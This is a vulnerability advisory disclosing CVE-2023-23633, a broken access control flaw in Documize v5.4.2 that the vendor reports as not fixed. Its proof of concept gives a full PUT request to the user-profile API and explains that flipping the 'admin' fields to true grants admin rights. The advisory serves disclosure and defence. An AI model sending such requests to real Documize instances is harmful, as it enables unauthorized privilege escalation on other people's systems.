usd-2022-0065 | Documize v5.4.2 (221021105923) - Broken Access Control
Advisory ID: usd-2022-0065
Product: Documize
Affected Version: v5.4.2 (221021105923)
Vulnerability Type: Broken Access Control (CWE-284)
Security Risk: Critical
Vendor URL: https://www.documize.com
Vendor Status: Not fixed
CVE number: CVE-2023-23633
Description
A Broken Access Control was found in documize, which allows a user to set theirselves admin permissions.
Proof of Concept
The following request was done to update a users profile.
PUT /api/users/cee5ocin9t3sjau0153g HTTP/1.1
Host: localhost:5001
Content-Length: 698
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: json
authorization: ey[REDACTED]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.99 Safari/537.36
[...]{"firstname":"jane","lastname":"doe","email":"janedoe@example.com","initials":"JD","active":true,"editor":true,"admin":false,"viewUsers":true,"analytics":false,"global":false,"accounts":[{"id":"cee5ocin9t3sjau01540","created":"2022-12-15T19:53:22.974178Z","revised":"2022-12-15T19:59:07.184606Z","admin":false,"editor":true,"viewUsers":true,"analytics":false,"userId":"cee5ocin9t3sjau0153g","orgId":"cee5o0qn9t3sjau010c0","company":"Test","title":"Test","message":"Documize Community instance contains all our documentation","domain":"","active":true,"theme":""}],"groups":null,"lastVersion":"","theme":"","created":"2022-12-15T19:53:22.973889Z","revised":"2022-12-15T19:59:07.183878Z","locale":""}
Changing the keys admin to true results in higher privileges.
Fix
Do not allow users to edit any fields on their database entry.
References
Timeline
- 2022-12-16: First contact request via mail
- 2023-01-09: Second contact request via mail
- 2023-01-16: Try to contact vendor again
- 2023-02-02: Try to contact vendor again
- 2023-12-22: Publish advisory
Credits
This security vulnerability was identified by Christian Pöschl of usd AG.